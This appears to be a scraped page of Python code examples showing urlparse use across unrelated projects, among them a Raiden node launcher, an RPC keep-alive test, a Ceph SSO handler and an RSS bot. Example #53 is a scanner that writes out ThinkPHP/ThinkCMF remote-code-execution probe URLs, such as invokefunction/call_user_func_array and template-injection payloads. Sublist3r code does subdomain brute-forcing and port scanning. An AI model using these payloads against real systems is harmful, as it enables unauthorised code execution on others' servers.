    (listen_host, listen_port) = split_endpoint(listen_address)
    (api_host, api_port) = split_endpoint(api_address)

    config['transport']['udp']['host'] = listen_host
    config['transport']['udp']['port'] = listen_port
    config['console'] = console
    config['rpc'] = rpc
    config['web_ui'] = rpc and web_ui
    config['api_host'] = api_host
    config['api_port'] = api_port
    if mapped_socket:
        config['socket'] = mapped_socket.socket
        config['transport']['udp']['external_ip'] = mapped_socket.external_ip
        config['transport']['udp'][
            'external_port'] = mapped_socket.external_port
    config['transport_type'] = transport
    config['transport']['matrix']['server'] = matrix_server
    config['transport']['udp'][
        'nat_keepalive_retries'] = DEFAULT_NAT_KEEPALIVE_RETRIES
    timeout = max_unresponsive_time / DEFAULT_NAT_KEEPALIVE_RETRIES
    config['transport']['udp']['nat_keepalive_timeout'] = timeout
    config[
        'unrecoverable_error_should_crash'] = unrecoverable_error_should_crash
    config['services'][
        'pathfinding_service_address'] = pathfinding_service_address
    config['services']['pathfinding_max_paths'] = pathfinding_max_paths

    parsed_eth_rpc_endpoint = urlparse(eth_rpc_endpoint)
    if not parsed_eth_rpc_endpoint.scheme:
        eth_rpc_endpoint = f'http://{eth_rpc_endpoint}'

    web3 = _setup_web3(eth_rpc_endpoint)

    rpc_client = JSONRPCClient(
        web3,
        privatekey_bin,
        gas_price_strategy=gas_price,
        block_num_confirmations=DEFAULT_NUMBER_OF_BLOCK_CONFIRMATIONS,
        uses_infura='infura.io' in eth_rpc_endpoint,
    )

    blockchain_service = BlockChainService(
        jsonrpc_client=rpc_client,
        # Not giving the contract manager here, but injecting it later
        # since we first need blockchain service to calculate the network id
    )

    given_network_id = network_id
    node_network_id = blockchain_service.network_id
    known_given_network_id = given_network_id in ID_TO_NETWORKNAME
    known_node_network_id = node_network_id in ID_TO_NETWORKNAME

    if node_network_id != given_network_id:
        if known_given_network_id and known_node_network_id:
            click.secho(
                f"The chosen ethereum network '{ID_TO_NETWORKNAME[given_network_id]}' "
                f"differs from the ethereum client '{ID_TO_NETWORKNAME[node_network_id]}'. "
                "Please update your settings.",
                fg='red',
            )
        else:
            click.secho(
                f"The chosen ethereum network id '{given_network_id}' differs "
                f"from the ethereum client '{node_network_id}'. "
                "Please update your settings.",
                fg='red',
            )
        sys.exit(1)

    config['chain_id'] = given_network_id

    # interpret the provided string argument
    if environment_type == Environment.PRODUCTION:
        # Safe configuration: restrictions for mainnet apply and matrix rooms have to be private
        config['environment_type'] = Environment.PRODUCTION
        config['transport']['matrix']['private_rooms'] = True
    else:
        config['environment_type'] = Environment.DEVELOPMENT

    environment_type = config['environment_type']
    print(f'Raiden is running in {environment_type.value.lower()} mode')

    chain_config = {}
    contract_addresses_known = False
    contracts = dict()
    contracts_version = 'pre_limits' if environment_type == Environment.DEVELOPMENT else None
    config['contracts_path'] = contracts_precompiled_path(contracts_version)
    if node_network_id in ID_TO_NETWORKNAME and ID_TO_NETWORKNAME[
            node_network_id] != 'smoketest':
        deployment_data = get_contracts_deployed(node_network_id,
                                                 contracts_version)
        not_allowed = (  # for now we only disallow mainnet with test configuration
            network_id == 1 and environment_type == Environment.DEVELOPMENT)
        if not_allowed:
            click.secho(
                f'The chosen network ({ID_TO_NETWORKNAME[node_network_id]}) is not a testnet, '
                'but the "development" environment was selected.\n'
                'This is not allowed. Please start again with a safe environment setting '
                '(--environment production).',
                fg='red',
            )
            sys.exit(1)

        contracts = deployment_data['contracts']
        contract_addresses_known = True

    blockchain_service.inject_contract_manager(
        ContractManager(config['contracts_path']))

    if sync_check:
        check_synced(blockchain_service, known_node_network_id)

    contract_addresses_given = (
        tokennetwork_registry_contract_address is not None
        and secret_registry_contract_address is not None
        and endpoint_registry_contract_address is not None)

    if not contract_addresses_given and not contract_addresses_known:
        click.secho(
            f"There are no known contract addresses for network id '{given_network_id}'. "
            "Please provide them on the command line or in the configuration file.",
            fg='red',
        )
        sys.exit(1)

    try:
        token_network_registry = blockchain_service.token_network_registry(
            tokennetwork_registry_contract_address or to_canonical_address(
                contracts[CONTRACT_TOKEN_NETWORK_REGISTRY]['address'], ), )
    except ContractVersionMismatch as e:
        handle_contract_version_mismatch(e)
    except AddressWithoutCode:
        handle_contract_no_code('token network registry',
                                tokennetwork_registry_contract_address)
    except AddressWrongContract:
        handle_contract_wrong_address(
            'token network registry',
            tokennetwork_registry_contract_address,
        )

    try:
        secret_registry = blockchain_service.secret_registry(
            secret_registry_contract_address or to_canonical_address(
                contracts[CONTRACT_SECRET_REGISTRY]['address'], ), )
    except ContractVersionMismatch as e:
        handle_contract_version_mismatch(e)
    except AddressWithoutCode:
        handle_contract_no_code('secret registry',
                                secret_registry_contract_address)
    except AddressWrongContract:
        handle_contract_wrong_address('secret registry',
                                      secret_registry_contract_address)

    database_path = os.path.join(
        datadir,
        f'node_{pex(address)}',
        f'netid_{given_network_id}',
        f'network_{pex(token_network_registry.address)}',
        f'v{RAIDEN_DB_VERSION}_log.db',
    )
    config['database_path'] = database_path

    print(
        '\nYou are connected to the \'{}\' network and the DB path is: {}'.
        format(
            ID_TO_NETWORKNAME.get(given_network_id, given_network_id),
            database_path,
        ), )

    discovery = None
    if transport == 'udp':
        transport, discovery = _setup_udp(
            config,
            blockchain_service,
            address,
            contracts,
            endpoint_registry_contract_address,
        )
    elif transport == 'matrix':
        transport = _setup_matrix(config)
    else:
        raise RuntimeError(f'Unknown transport type "{transport}" given')

    raiden_event_handler = RaidenEventHandler()
    message_handler = MessageHandler()

    try:
        if 'contracts' in chain_config:
            start_block = chain_config['contracts']['TokenNetworkRegistry'][
                'block_number']
        else:
            start_block = 0

        raiden_app = App(
            config=config,
            chain=blockchain_service,
            query_start_block=start_block,
            default_registry=token_network_registry,
            default_secret_registry=secret_registry,
            transport=transport,
            raiden_event_handler=raiden_event_handler,
            message_handler=message_handler,
            discovery=discovery,
        )
    except RaidenError as e:
        click.secho(f'FATAL: {e}', fg='red')
        sys.exit(1)

    try:
        raiden_app.start()
    except RuntimeError as e:
        click.secho(f'FATAL: {e}', fg='red')
        sys.exit(1)
    except filelock.Timeout:
        name_or_id = ID_TO_NETWORKNAME.get(given_network_id, given_network_id)
        click.secho(
            f'FATAL: Another Raiden instance already running for account {address_hex} on '
            f'network id {name_or_id}',
            fg='red',
        )
        sys.exit(1)

    return raiden_app

Example #50

0

Show file

File: crawler.py Project: mohaoqing/Nubility-project2

def is_absolute(url):
    return bool(urlparse(url).netloc)  #https://stackoverflow.com/questions/8357098/how-can-i-check-if-a-url-is-absolute-using-python

Example #51

0

Show file

File: __init__.py Project: dbrnz/flatmap-maker

 def filename(self):
     return urlparse(self.__url).path.rsplit('/', 1)[-1]

Example #52

0

Show file

File: httpbasics.py Project: mirzaei-ce/core-civilbit

    def run_test(self):

        #################################################
        # lowlevel check for http persistent connection #
        #################################################
        url = urlparse.urlparse(self.nodes[0].url)
        authpair = url.username + ':' + url.password
        headers = {"Authorization": "Basic " + base64.b64encode(authpair)}

        conn = httplib.HTTPConnection(url.hostname, url.port)
        conn.connect()
        conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
        out1 = conn.getresponse().read()
        assert_equal('"error":null' in out1, True)
        assert_equal(
            conn.sock != None,
            True)  #according to http/1.1 connection must still be open!

        #send 2nd request without closing connection
        conn.request('POST', '/', '{"method": "getchaintips"}', headers)
        out2 = conn.getresponse().read()
        assert_equal('"error":null' in out1,
                     True)  #must also response with a correct json-rpc message
        assert_equal(
            conn.sock != None,
            True)  #according to http/1.1 connection must still be open!
        conn.close()

        #same should be if we add keep-alive because this should be the std. behaviour
        headers = {
            "Authorization": "Basic " + base64.b64encode(authpair),
            "Connection": "keep-alive"
        }

        conn = httplib.HTTPConnection(url.hostname, url.port)
        conn.connect()
        conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
        out1 = conn.getresponse().read()
        assert_equal('"error":null' in out1, True)
        assert_equal(
            conn.sock != None,
            True)  #according to http/1.1 connection must still be open!

        #send 2nd request without closing connection
        conn.request('POST', '/', '{"method": "getchaintips"}', headers)
        out2 = conn.getresponse().read()
        assert_equal('"error":null' in out1,
                     True)  #must also response with a correct json-rpc message
        assert_equal(
            conn.sock != None,
            True)  #according to http/1.1 connection must still be open!
        conn.close()

        #now do the same with "Connection: close"
        headers = {
            "Authorization": "Basic " + base64.b64encode(authpair),
            "Connection": "close"
        }

        conn = httplib.HTTPConnection(url.hostname, url.port)
        conn.connect()
        conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
        out1 = conn.getresponse().read()
        assert_equal('"error":null' in out1, True)
        assert_equal(
            conn.sock != None,
            False)  #now the connection must be closed after the response

        #node1 (2nd node) is running with disabled keep-alive option
        urlNode1 = urlparse.urlparse(self.nodes[1].url)
        authpair = urlNode1.username + ':' + urlNode1.password
        headers = {"Authorization": "Basic " + base64.b64encode(authpair)}

        conn = httplib.HTTPConnection(urlNode1.hostname, urlNode1.port)
        conn.connect()
        conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
        out1 = conn.getresponse().read()
        assert_equal('"error":null' in out1, True)

        #node2 (third node) is running with standard keep-alive parameters which means keep-alive is on
        urlNode2 = urlparse.urlparse(self.nodes[2].url)
        authpair = urlNode2.username + ':' + urlNode2.password
        headers = {"Authorization": "Basic " + base64.b64encode(authpair)}

        conn = httplib.HTTPConnection(urlNode2.hostname, urlNode2.port)
        conn.connect()
        conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
        out1 = conn.getresponse().read()
        assert_equal('"error":null' in out1, True)
        assert_equal(
            conn.sock != None, True
        )  #connection must be closed because civilbitd should use keep-alive by default

        # Check excessive request size
        conn = httplib.HTTPConnection(urlNode2.hostname, urlNode2.port)
        conn.connect()
        conn.request('GET', '/' + ('x' * 1000), '', headers)
        out1 = conn.getresponse()
        assert_equal(out1.status, httplib.NOT_FOUND)

        conn = httplib.HTTPConnection(urlNode2.hostname, urlNode2.port)
        conn.connect()
        conn.request('GET', '/' + ('x' * 10000), '', headers)
        out1 = conn.getresponse()
        assert_equal(out1.status, httplib.BAD_REQUEST)

Example #53

0

Show file

    def run_detect(self, url):
        if not urlparse(url).scheme:
            url = 'https://' + url
        else:
            url = url
        try:
            #thinkphp3.0 ThinkPHP 2.1 { Fast & Simple OOP PHP Framework } rce 暂时还没找到能确定tp5.1的指纹，这里先用报错的
            rep = requests.get(url + "/index.php/herxdjhrelzfndk.html",
                               timeout=10,
                               verify=False)
            if "ThinkPHP" in rep.text and "2.1" in rep.text and "{ Fast & Simple OOP PHP Framework }" in rep.text:
                #if "phpinfo()" in requests.get(url + "/index.php/Index/index/name/$%7B@phpinfo%28%29%7D").text:
                cprint(
                    '[thinkphp 3.0 rce ] {}'.format(
                        url +
                        "/index.php/Index/index/name/$%7B@phpinfo%28%29%7D"),
                    'red')
                self.vul_list.append([
                    'thinkphp 3.0',
                    url + "/index.php/Index/index/name/$%7B@phpinfo%28%29%7D"
                ])
#            else:
#                cprint('[thinkphp 3.0] {}'.format(url), 'red')
#                self.vul_list.append(['thinkphp 3.0', url])
            if "ThinkPHP" in rep.text and "5.1" in rep.text and "www.thinkphp.cn" in rep.text:
                #if "phpinfo()" in requests.get(url + "/index.php?s=index/\\think\Request/input&filter=phpinfo&data=1").text:
                cprint(
                    '[thinkphp 5.1 rce ] {}'.format(
                        url +
                        "/index.php?s=index/\\think\Request/input&filter=phpinfo&data=1"
                    ), 'red')
                self.vul_list.append([
                    'thinkphp 5.1',
                    url + "/index.php/Index/index/name/$%7B@phpinfo%28%29%7D"
                ])
#            else:
#                cprint('[thinkphp 5.1] {}'.format(url), 'red')
#                self.vul_list.append(['thinkphp 5.1', url])
# thinkphp3.2 使用4e5e5d7364f443e28fbf0d3ae744a59a检测 rce
            rep = requests.get(url +
                               "/index.php?c=4e5e5d7364f443e28fbf0d3ae744a59a",
                               timeout=10,
                               verify=False)

            if rep.status_code == 200 and "PNG" in rep.text:
                #if "phpinfo()" in requests.get(url + "/?a=fetch&content=<?php%20phpinfo();die();").text:
                cprint(
                    '[thinkcmf 3.2 rce ] {}'.format(
                        url + "/?a=fetch&content=<?php%20phpinfo();die();"),
                    'red')
                self.vul_list.append([
                    'thinkcmf 3.2',
                    url + "/?a=fetch&content=<?php%20phpinfo();die();"
                ])
#           else:
#               cprint('[thinkphp 3.2] {}'.format(url), 'red')
#               self.vul_list.append(['thinkphp 3.2', url])
# thinkphp5.0 使用index.php?s=captcha检测
            rep = requests.get(url + "/index.php?s=captcha",
                               timeout=10,
                               verify=False)
            if rep.status_code == 200 and "PNG" in rep.text:
                #if "phpinfo()" in requests.get(url + "/index.php/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1").text:
                cprint(
                    '[thinkphp 5.0 rce ] {}'.format(
                        url +
                        "/index.php/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"
                    ), 'red')
                self.vul_list.append([
                    'thinkphp 5.0', url +
                    "/index.php/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"
                ])


#            else:
#               cprint('[thinkphp 5.0] {}'.format(url), 'red')
#               self.vul_list.append(['thinkphp 5.0', url])

        except Exception as e:
            pass

Example #54

0

Show file

File: fakeapt.py Project: aipad/bootstrap-11-mk

    def __init__(self, url, dist=None, comp=None, arch='iphoneos-arm'):
        self.url = url

        if dist is None:
            release_path = 'Release'
        else:
            release_path = '/'.join(('dists', dist, 'Release'))

        release = self._fetch_relative(release_path, verify=False)
        if release.ok:
            self._release = Utils.asstring_to_dict(release.text)
            self.name = self._release['Origin']
            self.label = self._release.get('Label', self.name)
        else:
            self._release = dict()
            urlparsed = urlparse(self.url)
            self.name = urlparsed.netloc + urlparsed.path
            self.label = self.name

        self._integrity_by_file = dict()

        if 'MD5Sum' in self._release:
            for l in self._release['MD5Sum'].split('\n'):
                l = l.strip()
                if not l:
                    continue

                md5sum, size, name = map(str.strip, l.split())

                self._integrity_by_file[name] = {
                    'size': int(size),
                    'md5': md5sum
                }

        self.packages = list()
        self.packages_by_name = dict()

        if dist is None or comp is None:
            packages_path = 'Packages'
        else:
            packages_path = '/'.join(('dists', dist, comp, 'binary-' + arch, 'Packages'))

        for pkgstr in self._fetch_bz2(packages_path).split('\n\n'):
            if not pkgstr:
                continue
            
            pkg = Package(pkgstr, self)

            self.packages.append(pkg)

            if pkg.name in self.packages_by_name:
                # print('warning: duplicate package %s' % pkg, end=' -- ')

                prevpkg = self.packages_by_name[pkg.name]
                if pkg.version > prevpkg.version:
                    # print('overriding prev (%s) since prev is older' % prevpkg)
                    self.packages_by_name[pkg.name] = pkg
                else:
                    pass
                    # print('not overriding prev (%s) since prev is newer' % prevpkg)
            else:
                self.packages_by_name[pkg.name] = pkg

Example #55

0

Show file

    def _get_unauthenticated_response(self, url, method='post'):
        """Get auth type by tasting headers from the server. Do POST requests be default. HEAD is too error prone, and
        some servers are set up to redirect to OWA on all requests except POST to the autodiscover endpoint.
        """
        # We are connecting to untrusted servers here, so take necessary precautions.
        hostname = urlparse(url).netloc
        if not is_valid_hostname(hostname,
                                 timeout=AutodiscoverProtocol.TIMEOUT):
            # 'requests' is really bad at reporting that a hostname cannot be resolved. Let's check this separately.
            # Don't retry on DNS errors. They will most likely be persistent.
            raise TransportError('%r has no DNS entry' % hostname)

        kwargs = dict(url=url,
                      headers=DEFAULT_HEADERS.copy(),
                      allow_redirects=False,
                      timeout=AutodiscoverProtocol.TIMEOUT)
        if method == 'post':
            kwargs['data'] = Autodiscover.payload(email=self.email)
        retry = 0
        t_start = time.monotonic()
        while True:
            _back_off_if_needed(self.INITIAL_RETRY_POLICY.back_off_until)
            log.debug('Trying to get response from %s', url)
            with AutodiscoverProtocol.raw_session() as s:
                try:
                    r = getattr(s, method)(**kwargs)
                    r.close()  # Release memory
                    break
                except TLS_ERRORS as e:
                    # Don't retry on TLS errors. They will most likely be persistent.
                    raise TransportError(str(e))
                except CONNECTION_ERRORS as e:
                    r = DummyResponse(url=url,
                                      headers={},
                                      request_headers=kwargs['headers'])
                    total_wait = time.monotonic() - t_start
                    if _may_retry_on_error(
                            response=r,
                            retry_policy=self.INITIAL_RETRY_POLICY,
                            wait=total_wait):
                        log.debug(
                            "Connection error on URL %s (retry %s, error: %s). Cool down",
                            url, retry, e)
                        self.INITIAL_RETRY_POLICY.back_off(self.RETRY_WAIT)
                        retry += 1
                        continue
                    else:
                        log.debug("Connection error on URL %s: %s", url, e)
                        raise TransportError(str(e))
        try:
            auth_type = get_auth_method_from_response(response=r)
        except UnauthorizedError:
            # Failed to guess the auth type
            auth_type = NOAUTH
        if r.status_code in (301, 302):
            if 'location' in r.headers:
                # Make the redirect URL absolute
                try:
                    r.headers['location'] = get_redirect_url(r)
                except TransportError:
                    del r.headers['location']
        return auth_type, r

Example #56

0

Show file

File: parser.py Project: MShaffar19/kitsune

def _is_youtube_url(url):
    """Returns true if the URL is to youtube."""
    parsed_url = urlparse(url)
    netloc = parsed_url.netloc
    return netloc in ["youtu.be", "youtube.com", "www.youtube.com"]

Example #57

0

Show file

File: wait-for-pr-ci-completion.py Project: jsquyres/ompi-scripts

log.setLevel(level)

ch = logging.StreamHandler()
ch.setLevel(level)

format = '%(asctime)s %(levelname)s: %(message)s'
formatter = logging.Formatter(format)

ch.setFormatter(formatter)

log.addHandler(ch)

#--------------------------------------------------------------------

# Pick apart the URL
parts = urlparse(args.pr)
path = parts.path
vals = path.split('/')
org  = vals[1]
repo = vals[2]
pull = vals[3]
num  = vals[4]

full_name = os.path.join(org, repo)
log.debug("Getting repo {r}...".format(r=full_name))
repo = g.get_repo(full_name)

log.debug("Getting PR {pr}...".format(pr=num))
pr = repo.get_pull(int(num))

log.info("PR {num}: {title}".format(num=num, title=pr.title))

Example #58

0

Show file

File: sublist3r.py Project: halencarjunior/Sublist3r

def main(domain, threads, savefile, ports, silent, verbose, enable_bruteforce, engines):
    bruteforce_list = set()
    search_list = set()

    if is_windows:
        subdomains_queue = list()
    else:
        subdomains_queue = multiprocessing.Manager().list()

    # Check Bruteforce Status
    if enable_bruteforce or enable_bruteforce is None:
        enable_bruteforce = True

    # Validate domain
    domain_check = re.compile("^(http|https)?[a-zA-Z0-9]+([\-\.]{1}[a-zA-Z0-9]+)*\.[a-zA-Z]{2,}$")
    if not domain_check.match(domain):
        if not silent:
            print(R + "Error: Please enter a valid domain" + W)
        return []

    if not domain.startswith('http://') or not domain.startswith('https://'):
        domain = 'http://' + domain

    parsed_domain = urlparse.urlparse(domain)

    if not silent:
        print(B + "[-] Enumerating subdomains now for %s" % parsed_domain.netloc + W)

    if verbose and not silent:
        print(Y + "[-] verbosity is enabled, will show the subdomains results in realtime" + W)

    supported_engines = {'baidu': BaiduEnum,
                         'yahoo': YahooEnum,
                         'google': GoogleEnum,
                         'bing': BingEnum,
                         'ask': AskEnum,
                         'netcraft': NetcraftEnum,
                         'dnsdumpster': DNSdumpster,
                         'virustotal': Virustotal,
                         'threatcrowd': ThreatCrowd,
                         'ssl': CrtSearch,
                         'passivedns': PassiveDNS
                         }

    chosenEnums = []

    if engines is None:
        chosenEnums = [
            BaiduEnum, YahooEnum, GoogleEnum, BingEnum, AskEnum,
            NetcraftEnum, DNSdumpster, Virustotal, ThreatCrowd,
            CrtSearch, PassiveDNS
        ]
    else:
        engines = engines.split(',')
        for engine in engines:
            if engine.lower() in supported_engines:
                chosenEnums.append(supported_engines[engine.lower()])

    # Start the engines enumeration
    enums = [enum(domain, [], q=subdomains_queue, silent=silent, verbose=verbose) for enum in chosenEnums]
    for enum in enums:
        enum.start()
    for enum in enums:
        enum.join()

    subdomains = set(subdomains_queue)
    for subdomain in subdomains:
        search_list.add(subdomain)

    if enable_bruteforce:
        if not silent:
            print(G + "[-] Starting bruteforce module now using subbrute.." + W)
        record_type = False
        path_to_file = os.path.dirname(os.path.realpath(__file__))
        subs = os.path.join(path_to_file, 'subbrute', 'names.txt')
        resolvers = os.path.join(path_to_file, 'subbrute', 'resolvers.txt')
        process_count = threads
        output = False
        json_output = False
        bruteforce_list = subbrute.print_target(parsed_domain.netloc, record_type, subs, resolvers, process_count, output, json_output, search_list, verbose)

    subdomains = search_list.union(bruteforce_list)

    if subdomains:
        subdomains = sorted(subdomains, key=subdomain_sorting_key)

        if savefile:
            write_file(savefile, subdomains)

        if not silent:
            print(Y + "[-] Total Unique Subdomains Found: %s" % len(subdomains) + W)

        if ports:
            if not silent:
                print(G + "[-] Start port scan now for the following ports: %s%s" % (Y, ports) + W)
            ports = ports.split(',')
            pscan = portscan(subdomains, ports)
            pscan.run()

        elif not silent:
            for subdomain in subdomains:
                print(G + subdomain + W)
    return subdomains

Example #59

0

Show file

File: sso.py Project: zwj262310/ceph

def handle_sso_command(cmd):
    if cmd['prefix'] not in ['dashboard sso enable saml2',
                             'dashboard sso disable',
                             'dashboard sso status',
                             'dashboard sso show saml2',
                             'dashboard sso setup saml2']:
        return -errno.ENOSYS, '', ''

    if not python_saml_imported:
        return -errno.EPERM, '', 'Required library not found: `python3-saml`'

    if cmd['prefix'] == 'dashboard sso enable saml2':
        try:
            Saml2Settings(mgr.SSO_DB.saml2.onelogin_settings)
        except Saml2Error:
            return -errno.EPERM, '', 'Single Sign-On is not configured: ' \
                'use `ceph dashboard sso setup saml2`'
        mgr.SSO_DB.protocol = 'saml2'
        mgr.SSO_DB.save()
        return 0, 'SSO is "enabled" with "SAML2" protocol.', ''

    if cmd['prefix'] == 'dashboard sso disable':
        mgr.SSO_DB.protocol = ''
        mgr.SSO_DB.save()
        return 0, 'SSO is "disabled".', ''

    if cmd['prefix'] == 'dashboard sso status':
        if mgr.SSO_DB.protocol == 'saml2':
            return 0, 'SSO is "enabled" with "SAML2" protocol.', ''

        return 0, 'SSO is "disabled".', ''

    if cmd['prefix'] == 'dashboard sso show saml2':
        return 0, json.dumps(mgr.SSO_DB.saml2.to_dict()), ''

    if cmd['prefix'] == 'dashboard sso setup saml2':
        ceph_dashboard_base_url = cmd['ceph_dashboard_base_url']
        idp_metadata = cmd['idp_metadata']
        idp_username_attribute = _get_optional_attr(cmd, 'idp_username_attribute', 'uid')
        idp_entity_id = _get_optional_attr(cmd, 'idp_entity_id', None)
        sp_x_509_cert_path = _get_optional_attr(cmd, 'sp_x_509_cert', '')
        sp_private_key_path = _get_optional_attr(cmd, 'sp_private_key', '')
        if sp_x_509_cert_path and not sp_private_key_path:
            return -errno.EINVAL, '', 'Missing parameter `sp_private_key`.'
        if not sp_x_509_cert_path and sp_private_key_path:
            return -errno.EINVAL, '', 'Missing parameter `sp_x_509_cert`.'
        has_sp_cert = sp_x_509_cert_path != "" and sp_private_key_path != ""
        if has_sp_cert:
            try:
                with open(sp_x_509_cert_path, 'r', encoding='utf-8') as f:
                    sp_x_509_cert = f.read()
            except FileNotFoundError:
                return -errno.EINVAL, '', '`{}` not found.'.format(sp_x_509_cert_path)
            try:
                with open(sp_private_key_path, 'r', encoding='utf-8') as f:
                    sp_private_key = f.read()
            except FileNotFoundError:
                return -errno.EINVAL, '', '`{}` not found.'.format(sp_private_key_path)
        else:
            sp_x_509_cert = ''
            sp_private_key = ''

        if os.path.isfile(idp_metadata):
            warnings.warn(
                "Please prepend 'file://' to indicate a local SAML2 IdP file", DeprecationWarning)
            with open(idp_metadata, 'r', encoding='utf-8') as f:
                idp_settings = Saml2Parser.parse(f.read(), entity_id=idp_entity_id)
        elif parse.urlparse(idp_metadata)[0] in ('http', 'https', 'file'):
            idp_settings = Saml2Parser.parse_remote(
                url=idp_metadata, validate_cert=False, entity_id=idp_entity_id)
        else:
            idp_settings = Saml2Parser.parse(idp_metadata, entity_id=idp_entity_id)

        url_prefix = prepare_url_prefix(mgr.get_module_option('url_prefix', default=''))
        settings = {
            'sp': {
                'entityId': '{}{}/auth/saml2/metadata'.format(ceph_dashboard_base_url, url_prefix),
                'assertionConsumerService': {
                    'url': '{}{}/auth/saml2'.format(ceph_dashboard_base_url, url_prefix),
                    'binding': "urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST"
                },
                'attributeConsumingService': {
                    'serviceName': "Ceph Dashboard",
                    "serviceDescription": "Ceph Dashboard Service",
                    "requestedAttributes": [
                        {
                            "name": idp_username_attribute,
                            "isRequired": True
                        }
                    ]
                },
                'singleLogoutService': {
                    'url': '{}{}/auth/saml2/logout'.format(ceph_dashboard_base_url, url_prefix),
                    'binding': 'urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect'
                },
                "x509cert": sp_x_509_cert,
                "privateKey": sp_private_key
            },
            'security': {
                "nameIdEncrypted": has_sp_cert,
                "authnRequestsSigned": has_sp_cert,
                "logoutRequestSigned": has_sp_cert,
                "logoutResponseSigned": has_sp_cert,
                "signMetadata": has_sp_cert,
                "wantMessagesSigned": has_sp_cert,
                "wantAssertionsSigned": has_sp_cert,
                "wantAssertionsEncrypted": has_sp_cert,
                "wantNameIdEncrypted": False,  # Not all Identity Providers support this.
                "metadataValidUntil": '',
                "wantAttributeStatement": False
            }
        }
        settings = Saml2Parser.merge_settings(settings, idp_settings)
        mgr.SSO_DB.saml2.onelogin_settings = settings
        mgr.SSO_DB.protocol = 'saml2'
        mgr.SSO_DB.save()
        return 0, json.dumps(mgr.SSO_DB.saml2.onelogin_settings), ''

    return -errno.ENOSYS, '', ''

Example #60

0

Show file

File: bot.py Project: Brawl345/RSSBot

def check_feed(bot, key):
    feed_url = re.match("^" + feed_hash.format("(.+):subs$"), key).group(1)
    logger.info(feed_url)
    data = feedparser.parse(feed_url)
    if "link" not in data.feed:
        if "status" in data and data["status"] != 200:
            logger.warning(_("{0} - Not a valid feed, got HTTP Code {1}").format(feed_url, data["status"]))
        else:
            logger.warning(_("{0} - Not a valid feed: {1}").format(feed_url, str(data.bozo_exception)))
        return None
    if "title" not in data.feed:
        feed_title = data.feed["link"]
    else:
        feed_title = data.feed["title"]
    last_entry_hash = feed_hash.format(feed_url + ":last_entry")
    last_entry = r.get(last_entry_hash)
    new_entries = utils.get_new_entries(data.entries, last_entry)
    for entry in reversed(new_entries):
        if "title" not in entry:
            post_title = _("No title")
        else:
            post_title = utils.remove_html_tags(entry["title"]).strip()
            post_title = post_title.replace("<", "&lt;").replace(">", "&gt;")
        if "link" not in entry:
            post_link = data.link
            link_name = post_link
        else:
            post_link = entry.link
            feedproxy = re.search("^https?://feedproxy\.google\.com/~r/(.+?)/.*", post_link)  # feedproxy.google.com
            if feedproxy:
                link_name = feedproxy.group(1)
            else:
                link_name = urlparse(post_link).netloc
        link_name = re.sub("^www\d?\.", "", link_name)  # remove www.
        if "content" in entry:
            content = utils.get_content(entry.content[0]["value"])
        elif "summary" in entry:
            content = utils.get_content(entry.summary)
        else:
            content = ""
        text = "<b>{post_title}</b>\n<i>{feed_title}</i>\n{content}".format(
            post_title=post_title,
            feed_title=feed_title,
            content=content
        )
        readmore = _("Read more on {0}").format(link_name)
        text += "\n<a href=\"{post_link}\">{readmore}</a>\n".format(
            post_link=post_link,
            readmore=readmore
        )
        for member in r.smembers(key):
            try:
                bot.sendMessage(
                    chat_id=member,
                    text=text,
                    parse_mode=telegram.ParseMode.HTML,
                    disable_web_page_preview=True
                )
            except telegram.error.Unauthorized:
                logger.warning(_("Chat {0} doesn't exist anymore, will be deleted.").format(member))
                r.srem(key, member)
                r.delete(feed_hash.format(member))
            except telegram.error.ChatMigrated as new_chat:
                new_chat_id = new_chat.new_chat_id
                logger.info(_("Chat migrated: ") + member + " -> " + str(new_chat_id))
                r.srem(key, member)
                r.sadd(key, new_chat_id)
                r.rename(feed_hash.format(member), feed_hash.format(new_chat_id))
                bot.sendMessage(
                    chat_id=member,
                    text=text,
                    parse_mode=telegram.ParseMode.HTML,
                    disable_web_page_preview=True
                )
            except telegram.error.TimedOut:
                pass
            except telegram.error.BadRequest as exception:
                logger.error(exception)

    if not r.exists(key):
        r.delete(last_entry_hash)
        return

    # Set the new last entry if there are any
    if new_entries:
        if "id" not in new_entries[0]:
            new_last_entry = new_entries[0].link
        else:
            new_last_entry = new_entries[0].id
        r.set(last_entry_hash, new_last_entry)